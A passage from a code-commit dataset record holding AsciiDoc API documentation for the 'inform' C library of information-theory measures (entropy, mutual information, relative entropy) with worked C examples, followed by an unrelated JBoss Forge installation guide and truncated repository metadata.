`by`.\n\n*Examples:*\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[20] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1};\nint const ys[20] = {0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1};\n\ndouble *ce = inform_local_conditional_entropy(xs, ys, 20, 2, 2, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ ce ~ { 3.00, 3.00, 0.19, 0.19, 0.19, 0.19, 0.19, 0.19, 0.19, 0.19,\n\/\/ 0.19, 0.19, 0.19, 0.19, 0.19, 0.19, 0.42, 0.42, 0.42, 2.00 }\n\ninform_local_conditional_entropy(ys, xs, 20, 2, 2, ce, &err);\nassert(inform_succeeded(&err));\n\/\/ ce ~ { 1.32, 1.32, 0.10, 0.10, 0.10, 0.10, 0.10, 0.10, 0.10, 0.10,\n\/\/ 0.10, 0.10, 0.10, 0.10, 0.10, 0.10, 0.74, 0.74, 0.74, 3.91 }\n\nfree(ce);\n----\n[horizontal]\nHeader:: `inform\/conditional_entropy.h`\n****\n\n[[cross-entropy]]\n== Cross Entropy\nhttps:\/\/en.wikipedia.org\/wiki\/Cross_entropy[Cross entropy] between two distributions\nstem:[p_X] and stem:[q_X] measures the amount of information needed to identify events\nusing a coding scheme optimized for stem:[q_X] when stem:[p_X] is the \"real\" distribution\nover stem:[X].\n[stem]\n++++\nH(p,q) = -\sum_{x} p(x) \log_2{q(x)}\n++++\nCross entropy's local variant is equivalent to the self-information of stem:[q_X], and as\nsuch is implemented by <<inform_local_block_entropy,inform_local_block_entropy>>.\n\nSee <<Cover1991>> for more details.\n\n****\n[[inform_cross_entropy]]\n[source,c]\n----\ndouble inform_cross_entropy(int const *ps, int const *qs, size_t n,\n int b, inform_error *err);\n----\nCompute the cross entropy between the \"true\" and \"unnatural\" distributions stem:[p_X] and\nstem:[q_X] from associated time series `ps` and `qs`, respectively.\n\n*Examples:*\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const ps[10] = {0,1,1,0,1,0,0,1,0,0};\nint const qs[10] = {0,0,0,0,0,1,1,0,0,1};\n\ndouble ce = inform_cross_entropy(ps, qs, 10, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ ce ~ 1.003530\n\nce = inform_cross_entropy(qs, ps, 10, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ ce ~ 0.912454\n----\n[horizontal]\nHeader:: `inform\/cross_entropy.h`\n****\n\n
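Cross entropy also decomposes by the standard identity stem:[H(p,q) = H(p) + D_{KL}(p||q)]: block entropy with stem:[k=1] gives stem:[H(p)], and <<relative-entropy,relative entropy>> (documented below) gives stem:[D_{KL}(p||q)], so the identity can be checked empirically on the same data. A sketch of that check, assuming `<math.h>` for `fabs`:\n\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const ps[10] = {0,1,1,0,1,0,0,1,0,0};\nint const qs[10] = {0,0,0,0,0,1,1,0,0,1};\n\ndouble cross = inform_cross_entropy(ps, qs, 10, 2, &err);\nassert(inform_succeeded(&err));\n\ndouble h = inform_block_entropy(ps, 1, 10, 2, 1, &err); \/\/ H(p)\nassert(inform_succeeded(&err));\n\ndouble kl = inform_relative_entropy(ps, qs, 10, 2, &err); \/\/ D_KL(p||q)\nassert(inform_succeeded(&err));\n\nassert(fabs(cross - (h + kl)) < 1e-6);\n----\n\n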
[[effective-information]]\n== Effective Information\n\n****\n[[inform_effective_info]]\n[source,c]\n----\ndouble inform_effective_info(double const *tpm, double const *inter,\n size_t n, inform_error *err);\n----\n[horizontal]\nHeader:: `inform\/effective_info.h`\n****\n\n
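The argument semantics are not spelled out here, so the following is only a calling sketch under our reading of the names: we assume that `tpm` is an `n`-by-`n`, row-stochastic transition probability matrix stored in row-major order, and that `inter` is an intervention distribution over the `n` states. Both of those readings are assumptions rather than guarantees of the API, and no output value is asserted.\n\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\n\/\/ assumption: a 2-state system whose TPM rows each sum to one\ndouble const tpm[4] = {0.2, 0.8, \/\/ transitions out of state 0 (assumed row-major)\n 0.7, 0.3}; \/\/ transitions out of state 1\ndouble const inter[2] = {0.5, 0.5}; \/\/ assumed intervention distribution\ndouble ei = inform_effective_info(tpm, inter, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ the value of `ei` is deliberately not asserted here\n----\n\n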
[[entropy-rate]]\n== Entropy Rate\nhttps:\/\/en.wikipedia.org\/wiki\/Entropy_rate[Entropy rate] quantifies the amount of\ninformation needed to describe the next state of stem:[X] given observations of\nstem:[X^{(k)}]. In other words, it is the entropy of the time series conditioned on the\nstem:[k]-histories. The local entropy rate\n[stem]\n++++\nh_{X,i}(k) = \log_2{\frac{p(x_i^{(k)}, x_{i+1})}{p(x_i^{(k)})}}\n++++\ncan be averaged to obtain the global entropy rate\n[stem]\n++++\nH_X(k) = \langle h_{X,i}(k) \rangle_i\n = \sum_{x_i^{(k)},x_{i+1}} p(x_i^{(k)},x_{i+1}) \log_2{\frac{p(x_i^{(k)}, x_{i+1})}{p(x_i^{(k)})}}.\n++++\nMuch as with <<active-info, active information>>, the local and average entropy rates are\nformally obtained in the limit\n[stem]\n++++\nh_{X,i} = \lim_{k\rightarrow \infty}h_{X,i}(k)\n\qquad \textrm{and} \qquad\nH_X = \lim_{k\rightarrow \infty}H_X(k),\n++++\n\nbut we do not provide limiting functionality in this library\n(https:\/\/github.com\/elife-asu\/inform\/issues\/24[yet]!).\n\nSee <<Cover1991>> for more details.\n\n****\n[[inform_entropy_rate]]\n[source,c]\n----\ndouble inform_entropy_rate(int const *series, size_t n, size_t m,\n int b, size_t k, inform_error *err);\n----\nCompute the average entropy rate with a history length `k`.\n\n*Examples:*\n\nOne initial condition:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[9] = {0,0,1,1,1,1,0,0,0};\ndouble er = inform_entropy_rate(series, 1, 9, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ er ~ 0.679270\n----\n\nTwo initial conditions:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[18] = {0,0,1,1,1,1,0,0,0,\n 1,0,0,1,0,0,1,0,0};\ndouble er = inform_entropy_rate(series, 2, 9, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ er ~ 0.625349\n----\n[horizontal]\nHeader:: `inform\/entropy_rate.h`\n****\n\n****\n[[inform_local_entropy_rate]]\n[source,c]\n----\ndouble *inform_local_entropy_rate(int const *series, size_t n,\n size_t m, int b, size_t k, double *er, inform_error *err);\n----\nCompute the local entropy rate with a history length `k`.\n\n*Examples:*\n\nOne initial condition:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[9] = {0,0,1,1,1,1,0,0,0};\ndouble *er = inform_local_entropy_rate(series, 1, 9, 2, 2, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ er ~ { 1.000, 0.000, 0.585, 0.585, 1.585, 0.000, 1.000 }\nfree(er);\n----\n\nTwo initial conditions:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[18] = {0,0,1,1,1,1,0,0,0,\n 1,0,0,1,0,0,1,0,0};\ndouble er[14];\ninform_local_entropy_rate(series, 2, 9, 2, 2, er, &err);\nassert(inform_succeeded(&err));\n\/\/ er ~ { 0.415, 1.585, 0.585, 0.585, 1.585, 0.000, 2.000,\n\/\/ 0.000, 0.415, 0.585, 0.000, 0.415, 0.585, 0.000 }\n\n\/\/ no need to free since `er` was allocated on the stack in this scope\n\/\/ free(er);\n----\n[horizontal]\nHeader:: `inform\/entropy_rate.h`\n****\n\n[[excess-entropy]]\n== Excess Entropy\n\n****\n[[inform_excess_entropy]]\n[source,c]\n----\ndouble inform_excess_entropy(int const *series, size_t n, size_t m,\n int b, size_t k, inform_error *err);\n----\n[horizontal]\nHeader:: `inform\/excess_entropy.h`\n****\n\n****\n[[inform_local_excess_entropy]]\n[source,c]\n----\ndouble *inform_local_excess_entropy(int const *series, size_t n,\n size_t m, int b, size_t k, double *ee, inform_error *err);\n----\n[horizontal]\nHeader:: `inform\/excess_entropy.h`\n****\n\n[[information-flow]]\n== Information Flow\n\n****\n[[inform_information_flow]]\n[source,c]\n----\ndouble inform_information_flow(int const *src, int const *dst,\n int const *back, size_t l_src, size_t l_dst, size_t l_back,\n size_t n, size_t m, int b, inform_error *err);\n----\n[horizontal]\nHeader:: `inform\/information_flow.h`\n****\n\n[[evidence-of-integration]]\n== Evidence Of Integration\n\n****\n[[inform_integration_evidence]]\n[source,c]\n----\ndouble *inform_integration_evidence(int const *series, size_t l,\n size_t n, int const *b, double *evidence, inform_error *err);\n----\n[horizontal]\nHeader:: `inform\/information_flow.h`\n****\n\n****\n[[inform_integration_evidence_part]]\n[source,c]\n----\ndouble *inform_integration_evidence_part(int const *series, size_t l,\n size_t n, int const *b, size_t const *parts, size_t nparts,\n double *evidence, inform_error *err);\n----\n[horizontal]\nHeader:: `inform\/information_flow.h`\n****\n\n[[mutual-information]]\n== Mutual Information\nhttps:\/\/en.wikipedia.org\/wiki\/Mutual_information[Mutual information] (MI) is a measure of\nthe amount of mutual dependence between at least two random variables. Locally, MI is\ndefined as\n[stem]\n++++\ni_i(X_1,\ldots,X_l) = \log_2{\frac{p(x_{1,i},\ldots,x_{l,i})}{p(x_{1,i})\ldots p(x_{l,i})}}.\n++++\nThe mutual information is then just the time average of stem:[i_i(X_1,\ldots,X_l)]:\n[stem]\n++++\nI(X_1,\ldots,X_l) =\n \sum_{x_{1,i},\ldots,x_{l,i}} p(x_{1,i},\ldots,x_{l,i}) \log_2{\frac{p(x_{1,i},\ldots,x_{l,i})}{p(x_{1,i})\ldots p(x_{l,i})}}.\n++++\nSee <<Cover1991>> for more details.\n\n****\n[[inform_mutual_info]]\n[source,c]\n----\ndouble inform_mutual_info(int const *series, size_t l, size_t n,\n int const *b, inform_error *err);\n----\nCompute the mutual information between two or more time series.\n\nFor this function, `l` is the number of random variables, and `n` is the length of each\nvariable's time series. Each variable can have a different base, so `b` is an array of\nlength `l`.\n\n*Examples:*\n\nTwo variables:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[40] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1, \/\/ var 1\n 0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1}; \/\/ var 2\n\ndouble mi = inform_mutual_info(xs, 2, 20, (int[2]){2,2}, &err);\nassert(inform_succeeded(&err));\n\/\/ mi ~ 0.214171\n----\n\nThree variables:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[60] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1, \/\/ var 1\n 0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1, \/\/ var 2\n 1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1}; \/\/ var 3\n\ndouble mi = inform_mutual_info(xs, 3, 20, (int[3]){2,2,2}, &err);\nassert(inform_succeeded(&err));\n\/\/ mi ~ 1.095462\n----\n[horizontal]\nHeader:: `inform\/mutual_info.h`\n****\n\n****\n[[inform_local_mutual_info]]\n[source,c]\n----\ndouble *inform_local_mutual_info(int const *series, size_t l, size_t n,\n int const *b, double *mi, inform_error *err);\n----\nCompute the local mutual information between two or more time series.\n\nFor this function, `l` is the number of random variables, and `n` is the length of each\nvariable's time series. Each variable can have a different base, so `b` is an array of\nlength `l`.\n\n*Examples:*\n\nTwo variables:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[40] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1, \/\/ var 1\n 0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1}; \/\/ var 2\n\ndouble *mi = inform_local_mutual_info(xs, 2, 20, (int[2]){2,2}, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ mi ~ { -1.000, -1.000, 0.222, 0.222, 0.222, 0.222, 0.222, 0.222,\n\/\/ 0.222, 0.222, 0.222, 0.222, 0.222, 0.222, 0.222, 0.222,\n\/\/ 1.585, 1.585, 1.585, -1.585 }\nfree(mi);\n----\n\nThree variables:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[60] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1, \/\/ var 1\n 0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1, \/\/ var 2\n 1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1}; \/\/ var 3\n\ndouble *mi = inform_local_mutual_info(xs, 3, 20, (int[3]){2,2,2}, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ mi ~ { 0.737, 0.737, 0.737, 0.737, 0.737, 0.737, 0.737, 0.737,\n\/\/ 0.737, 0.737, 0.737, 0.737, 0.737, 0.737, 0.737, 0.737,\n\/\/ 3.322, 3.322, 0.322, 0.152 }\nfree(mi);\n----\n[horizontal]\nHeader:: `inform\/mutual_info.h`\n****\n\n
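Mutual information ties together several of the measures above through the identity stem:[I(X;Y) = H(Y) - H(Y|X)]. The sketch below checks it empirically, reusing the series from the <<conditional-entropy,conditional entropy>> examples; note that the two series are packed into a single row-major array for <<inform_mutual_info,inform_mutual_info>>, and that `<math.h>` is assumed for `fabs`.\n\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[40] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1, \/\/ X\n 0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1}; \/\/ Y\n\ndouble mi = inform_mutual_info(xs, 2, 20, (int[2]){2,2}, &err);\nassert(inform_succeeded(&err));\n\ndouble hy = inform_block_entropy(xs + 20, 1, 20, 2, 1, &err); \/\/ H(Y)\nassert(inform_succeeded(&err));\n\ndouble ce = inform_conditional_entropy(xs, xs + 20, 20, 2, 2, &err); \/\/ H(Y|X)\nassert(inform_succeeded(&err));\n\nassert(fabs(mi - (hy - ce)) < 1e-6);\n----\n\n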
[[partial-information-decomposition]]\n== Partial Information Decomposition\n\n****\n[[inform_pid_source]]\n[source,c]\n----\ntypedef struct inform_pid_source\n{\n size_t *name;\n struct inform_pid_source **above;\n struct inform_pid_source **below;\n size_t size, n_above, n_below;\n double imin;\n double pi;\n} inform_pid_source;\n----\n[horizontal]\nHeader:: `inform\/pid.h`\n****\n\n****\n[[inform_pid_lattice]]\n[source,c]\n----\ntypedef struct inform_pid_lattice\n{\n inform_pid_source **sources;\n inform_pid_source *top;\n inform_pid_source *bottom;\n size_t size;\n} inform_pid_lattice;\n----\n[horizontal]\nHeader:: `inform\/pid.h`\n****\n\n****\n[[inform_pid_lattice_free]]\n[source,c]\n----\nvoid inform_pid_lattice_free(inform_pid_lattice *l);\n----\n[horizontal]\nHeader:: `inform\/pid.h`\n****\n\n****\n[[inform_pid]]\n[source,c]\n----\ninform_pid_lattice *inform_pid(int const *stimulus,\n int const *responses, size_t l, size_t n, int bs,\n int const *br, inform_error *err);\n----\n[horizontal]\nHeader:: `inform\/pid.h`\n****\n\n
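No worked example accompanies the decomposition itself, so the following is only a usage sketch: the argument order and field names come from the declarations above, but the concrete series are arbitrary and the reading of `pi` as each source's partial information is our interpretation of the structure.\n\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const stimulus[10] = {0,1,1,0,1,0,0,1,1,0};\nint const responses[20] = {0,1,1,0,1,0,0,1,1,0, \/\/ response source #1\n 1,1,0,0,1,1,0,0,1,0}; \/\/ response source #2\n\n\/\/ l = 2 response sources, n = 10 time steps, binary stimulus (bs) and responses (br)\ninform_pid_lattice *lattice =\n inform_pid(stimulus, responses, 2, 10, 2, (int[2]){2,2}, &err);\nassert(inform_succeeded(&err));\n\n\/\/ walk the lattice; no particular values are asserted\ndouble total = 0.0;\nfor (size_t i = 0; i < lattice->size; ++i)\n{\n total += lattice->sources[i]->pi;\n}\ninform_pid_lattice_free(lattice);\n----\n\n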
[[predictive-information]]\n== Predictive Information\n\n****\n[[inform_predictive_info]]\n[source,c]\n----\ndouble inform_predictive_info(int const *series, size_t n, size_t m,\n int b, size_t kpast, size_t kfuture, inform_error *err);\n----\n[horizontal]\nHeader:: `inform\/predictive_info.h`\n****\n\n****\n[[inform_local_predictive_info]]\n[source,c]\n----\ndouble *inform_local_predictive_info(int const *series, size_t n,\n size_t m, int b, size_t kpast, size_t kfuture, double *pi,\n inform_error *err);\n----\n[horizontal]\nHeader:: `inform\/predictive_info.h`\n****\n\n
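Only the signatures are given for predictive information, so here is a calling sketch that follows this section's conventions; reading `kpast` and `kfuture` as the history and future block lengths is our interpretation of the parameter names, and no output values are asserted.\n\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[9] = {0,0,1,1,1,1,0,0,0};\n\n\/\/ one initial condition, nine time steps, base-2 states,\n\/\/ two-step histories (kpast = 2) and one-step futures (kfuture = 1)\ndouble pi = inform_predictive_info(series, 1, 9, 2, 2, 1, &err);\nassert(inform_succeeded(&err));\n\ndouble *lpi = inform_local_predictive_info(series, 1, 9, 2, 2, 1, NULL, &err);\nassert(inform_succeeded(&err));\nfree(lpi);\n----\n\n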
[[relative-entropy]]\n== Relative Entropy\nhttps:\/\/en.wikipedia.org\/wiki\/Kullback%E2%80%93Leibler_divergence[Relative entropy], also\nknown as the Kullback-Leibler divergence, measures the amount of information gained in\nswitching from a prior distribution stem:[q_X] to a posterior distribution stem:[p_X] over\n_the same support_:\n[stem]\n++++\nD_{KL}(p||q) = \sum_{x_i} p(x_i) \log_2{\frac{p(x_i)}{q(x_i)}}.\n++++\nThe local counterpart is\n[stem]\n++++\nd_{KL,i}(p||q) = \log_2{\frac{p(x_i)}{q(x_i)}}.\n++++\nNote that the average in moving from the local to the non-local relative entropy is taken\nover the posterior distribution.\n\nSee <<Kullback1951>> and <<Cover1991>> for more information.\n\n****\n[[inform_relative_entropy]]\n[source,c]\n----\ndouble inform_relative_entropy(int const *xs, int const *ys, size_t n,\n int b, inform_error *err);\n----\nCompute the relative entropy between time series drawn from posterior and prior\ndistributions, here `xs` and `ys` respectively.\n\n*Examples:*\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[10] = {0,1,0,0,0,0,0,0,0,1};\nint const ys[10] = {0,1,1,1,1,0,0,1,0,0};\n\ndouble re = inform_relative_entropy(xs, ys, 10, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ re ~ 0.278072\n\nre = inform_relative_entropy(ys, xs, 10, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ re ~ 0.321928\n----\n[horizontal]\nHeader:: `inform\/relative_entropy.h`\n****\n\n****\n[[inform_local_relative_entropy]]\n[source,c]\n----\ndouble *inform_local_relative_entropy(int const *xs, int const *ys,\n size_t n, int b, double *re, inform_error *err);\n----\nCompute the local relative entropy between time series drawn from posterior and prior\ndistributions, here `xs` and `ys` respectively.\n\n*Examples:*\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[10] = {0,1,0,0,0,0,0,0,0,1};\nint const ys[10] = {0,1,1,1,1,0,0,1,0,0};\n\ndouble *re = inform_local_relative_entropy(xs, ys, 10, 2, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ re ~ { 0.678, -1.322, 0.678, 0.678, 0.678, 0.678, 0.678,\n\/\/ 0.678, 0.678, -1.322 }\n\ninform_local_relative_entropy(ys, xs, 10, 2, re, &err);\nassert(inform_succeeded(&err));\n\/\/ re ~ { -0.678, 1.322, 1.322, 1.322, 1.322, -0.678, -0.678, 1.322,\n\/\/ -0.678, -0.678 }\n\nfree(re);\n----\n[horizontal]\nHeader:: `inform\/relative_entropy.h`\n****\n\n[[separable-information]]\n== Separable Information\n\n****\n[[inform_separable_info]]\n[source,c]\n----\ndouble inform_separable_info(int const *srcs, int const *dest,\n size_t l, size_t n, size_t m, int b, size_t k,\n inform_error *err);\n----\n[horizontal]\nHeader:: `inform\/separable_info.h`\n****\n\n****\n[[inform_local_separable_info]]\n[source,c]\n----\ndouble *inform_local_separable_info(int const *srcs, int const *dest,\n size_t l, size_t n, size_t m, int b, size_t k, double *si,\n inform_error *err);\n----\n[horizontal]\nHeader:: `inform\/separable_info.h`\n****\n\n[[transfer-entropy]]\n== Transfer Entropy\n\n****\n[[inform_transfer_entropy]]\n[source,c]\n----\ndouble inform_transfer_entropy(int const *src, int const *dst,\n int const *back, size_t l, size_t n, size_t m, int b, size_t k,\n inform_error *err);\n----\n[horizontal]\nHeader:: `inform\/transfer_entropy.h`\n****\n\n****\n[[inform_local_transfer_entropy]]\n[source,c]\n----\ndouble *inform_local_transfer_entropy(int const *src, int const *dst,\n int const *back, size_t l, size_t n, size_t m, int b, size_t k,\n double *te, inform_error *err);\n----\n[horizontal]\nHeader:: `inform\/transfer_entropy.h`\n****\n","old_contents":"
","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"d067c610710d617777e6f1ca0a87232413609dc9","subject":"Update Installation.asciidoc","message":"Update Installation.asciidoc","repos":"forge\/docs,agoncal\/docs,forge\/docs,luiz158\/docs,luiz158\/docs,agoncal\/docs","old_file":"get_started\/Installation.asciidoc","new_file":"get_started\/Installation.asciidoc","new_contents":"== Installing Forge\n\nInstalling Forge is a relatively short process, and this guide will take you through the fundamentals (providing links to external materials if required); however, if you encounter any issues with this process, please ask in the Forge Users mailing list, or if you think something is wrong with this guide, report a defect to the team.\n\n=== Install a Forge Distribution\n\nFollow these steps to install a Forge distribution:\n\n*1. Ensure that you have already installed http:\/\/www.oracle.com\/technetwork\/java\/javase\/downloads\/index.html[a Java 7+ JDK].* We recommend installing JDK 8.\n\n*2. https:\/\/repository.jboss.org\/nexus\/service\/local\/artifact\/maven\/redirect?r=releases&g=org.jboss.forge&a=forge-distribution&v=LATEST&e=zip&c=offline[Download] and un-zip Forge into a folder on your hard disk; this folder will be your `FORGE_HOME`*\n\n*3. 
Add `$FORGE_HOME\/bin` to your path (http:\/\/www.google.com\/search?q=windows+edit+path[windows], http:\/\/www.google.com\/search?q=linux+set+path[linux], http:\/\/www.google.com\/search?q=mac+osx+edit+path[mac osx])*\n\nOn Unix-based operating systems, this typically means editing your `~\/.bashrc` or `~\/.profile`; you will need to add the following entries:\n\n[source]\n----\nexport FORGE_HOME=~\/forge\/\nexport PATH=$PATH:$FORGE_HOME\/bin\n----\n\nOn Windows, you will need to open the \"Control Panel\", click \"System Properties\", open the \"Advanced\" tab, then click \"Environment Variables\" and add these two entries visually. It is recommended to set User variables for Forge, unless you have placed the unzipped distribution in a folder where all users can access it.\n\n****\nYou may also simply create a shortcut to `bin\/forge` (Unix) or `bin\\forge.bat` (Windows) and place it on your Desktop.\n****\n\n*4. Consider installing http:\/\/git-scm.com\/[Git] and http:\/\/maven.apache.org\/[Maven 3.1+] (both optional)*\n\n*5. Open a command prompt and run `forge`, located in `$FORGE_HOME\/bin\/` (if you are on Windows, you will need to run `forge.bat` unless using a Unix-style terminal)*\n\n[source]\n----\nlocalhost:~ $ forge\n[~] $\n----\n\n=== That's it! You've got Forge installed, but what to do next?\n\nYou can start by Forging your first http:\/\/forge.jboss.org\/document\/write-a-java-ee-web-application-basic[Java EE webapp in about five minutes], and there are a few things you should probably check out. If you are confused at any time, try pressing *TAB*. For instance, if you have not yet seen the Forge built-in commands, you may either press TAB to see a list of the currently available commands, or get a more descriptive list by typing:\n\n[source]\n----\n$ command-list\n----\n\nYou may also use the `man` command for more detailed information about Forge itself, a plugin, or a command.\n\n[source]\n----\n$ man {command-name}\n----\n","old_contents":"== Installing Forge\n\nInstalling Forge is a relatively short process, and this guide will take you through the fundamentals (providing links to external materials if required); however, if you encounter any issues with this process, please ask in the Forge Users mailing list, or if you think something is wrong with this guide, report a defect to the team.\n\n=== Install a Forge Distribution\n\nFollow these steps to install a Forge distribution:\n\n*1. Ensure that you have already installed http:\/\/www.oracle.com\/technetwork\/java\/javase\/downloads\/index.html[a Java 7+ JDK].*\n\n*2. https:\/\/repository.jboss.org\/nexus\/service\/local\/artifact\/maven\/redirect?r=releases&g=org.jboss.forge&a=forge-distribution&v=LATEST&e=zip&c=offline[Download] and un-zip Forge into a folder on your hard disk; this folder will be your `FORGE_HOME`*\n\n*3. Add `$FORGE_HOME\/bin` to your path (http:\/\/www.google.com\/search?q=windows+edit+path[windows], http:\/\/www.google.com\/search?q=linux+set+path[linux], http:\/\/www.google.com\/search?q=mac+osx+edit+path[mac osx])*\n\nOn Unix-based operating systems, this typically means editing your `~\/.bashrc` or `~\/.profile`; you will need to add the following entries:\n\n[source]\n----\nexport FORGE_HOME=~\/forge\/\nexport PATH=$PATH:$FORGE_HOME\/bin\n----\n\nOn Windows, you will need to open the \"Control Panel\", click \"System Properties\", open the \"Advanced\" tab, then click \"Environment Variables\" and add these two entries visually. 
It is recommended to set User variables for Forge, unless you have placed the unzipped distribution in a folder where all users can access it.\n\n****\nYou may also simply create a shortcut to `bin\/forge` (Unix,) or `bin\\forge.bat` (Windows,) and place it on your Desktop.\n****\n\n*4. Consider installing http:\/\/git-scm.com\/[Git] and http:\/\/maven.apache.org\/[Maven 3.1+] (both optional)*\n\n*5. Open a command prompt and run `forge` - located in $FORGE_HOME\/bin\/ (if you are on Windows, you will need to run `forge.bat` unless using a Unix-style terminal)*\n\n[source]\n----\nlocalhost:~ $ forge\n[~] $\n----\n\n=== That's it! You've got Forge installed, but what to do next?\n\nYou can start by Forging your first http:\/\/forge.jboss.org\/document\/write-a-java-ee-web-application-basic[Java EE webapp in about five minutes], and there are a few things you should probably check-out. If you are confused at any time, try pressing *TAB*. For instance, if you have not yet seen the Forge built-in commands, you may either press TAB to see a list of the currently available commands, or get a more descriptive list by typing:\n\n[source]\n----\n$ command-list\n----\n\nYou may also use the `man` command for more detailed information about available Forge, a plugin, or a command.\n\n[source]\n----\n$ man {command-name}\n----\n","returncode":0,"stderr":"","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"a3bbb2011283a42f50045d689ab9ad2433300037","subject":"CAMEL-11059: Remove example that was using spring-dm","message":"CAMEL-11059: Remove example that was using spring-dm\n","repos":"tdiesler\/camel,tadayosi\/camel,Fabryprog\/camel,akhettar\/camel,pkletsko\/camel,mgyongyosi\/camel,christophd\/camel,alvinkwekel\/camel,rmarting\/camel,pkletsko\/camel,punkhorn\/camel-upstream,anoordover\/camel,snurmine\/camel,ullgren\/camel,rmarting\/camel,nikhilvibhav\/camel,drsquidop\/camel,christophd\/camel,anton-k11\/camel,CodeSmell\/camel,curso007\/camel,tadayosi\/camel,cunningt\/camel,davidkarlsen\/camel,pkletsko\/camel,jamesnetherton\/camel,acartapanis\/camel,nboukhed\/camel,nboukhed\/camel,apache\/camel,apache\/camel,tdiesler\/camel,scranton\/camel,tlehoux\/camel,snurmine\/camel,gautric\/camel,prashant2402\/camel,CodeSmell\/camel,scranton\/camel,nicolaferraro\/camel,isavin\/camel,dmvolod\/camel,rmarting\/camel,rmarting\/camel,akhettar\/camel,yuruki\/camel,adessaigne\/camel,tlehoux\/camel,Thopap\/camel,snurmine\/camel,jonmcewen\/camel,alvinkwekel\/camel,prashant2402\/camel,rmarting\/camel,DariusX\/camel,pax95\/camel,prashant2402\/camel,anton-k11\/camel,gnodet\/camel,acartapanis\/camel,alvinkwekel\/camel,gautric\/camel,scranton\/camel,ullgren\/camel,tadayosi\/camel,adessaigne\/camel,curso007\/camel,mcollovati\/camel,drsquidop\/camel,objectiser\/camel,Thopap\/camel,gnodet\/camel,tdiesler\/camel,onders86\/camel,akhettar\/camel,sverkera\/camel,tlehoux\/camel,zregvart\/camel,nboukhed\/camel,yuruki\/camel,jonmcewen\/camel,apache\/camel,dmvolod\/camel,zregvart\/camel,akhettar\/camel,tdiesler\/camel,gautric\/camel,tlehoux\/camel,jamesnetherton\/camel,drsquidop\/camel,nicolaferraro\/camel,nboukhed\/camel,kevinearls\/camel,Thopap\/camel,adessaigne\/camel,drsquidop\/camel,sverkera\/camel,gnodet\/camel,nikhilvibhav\/camel,acartapanis\/camel,Thopap\/camel,tadayosi\/camel,jamesnetherton\/camel,jamesnetherton\/camel,anton-k11\/camel,scranton\/camel,pkletsko\/camel,sverkera\/camel,anoordover\/camel,curso007\/camel,gautric\/camel,mcollovati\/camel,pax95\/camel,pmoerenhout\/camel,anton-k11\/camel,pmoerenhout\/camel,Fabryprog\/camel
,Fabryprog\/camel,onders86\/camel,apache\/camel,yuruki\/camel,alvinkwekel\/camel,davidkarlsen\/camel,sverkera\/camel,anoordover\/camel,scranton\/camel,isavin\/camel,DariusX\/camel,CodeSmell\/camel,curso007\/camel,drsquidop\/camel,yuruki\/camel,jonmcewen\/camel,onders86\/camel,curso007\/camel,onders86\/camel,Thopap\/camel,tlehoux\/camel,ullgren\/camel,jonmcewen\/camel,zregvart\/camel,nicolaferraro\/camel,DariusX\/camel,salikjan\/camel,pmoerenhout\/camel,anoordover\/camel,dmvolod\/camel,gautric\/camel,kevinearls\/camel,prashant2402\/camel,jamesnetherton\/camel,adessaigne\/camel,snurmine\/camel,jamesnetherton\/camel,isavin\/camel,pmoerenhout\/camel,pmoerenhout\/camel,onders86\/camel,ullgren\/camel,mcollovati\/camel,yuruki\/camel,nicolaferraro\/camel,isavin\/camel,tdiesler\/camel,tdiesler\/camel,cunningt\/camel,nikhilvibhav\/camel,objectiser\/camel,drsquidop\/camel,snurmine\/camel,cunningt\/camel,acartapanis\/camel,acartapanis\/camel,kevinearls\/camel,mcollovati\/camel,objectiser\/camel,anton-k11\/camel,onders86\/camel,sverkera\/camel,acartapanis\/camel,zregvart\/camel,nikhilvibhav\/camel,apache\/camel,tadayosi\/camel,apache\/camel,tlehoux\/camel,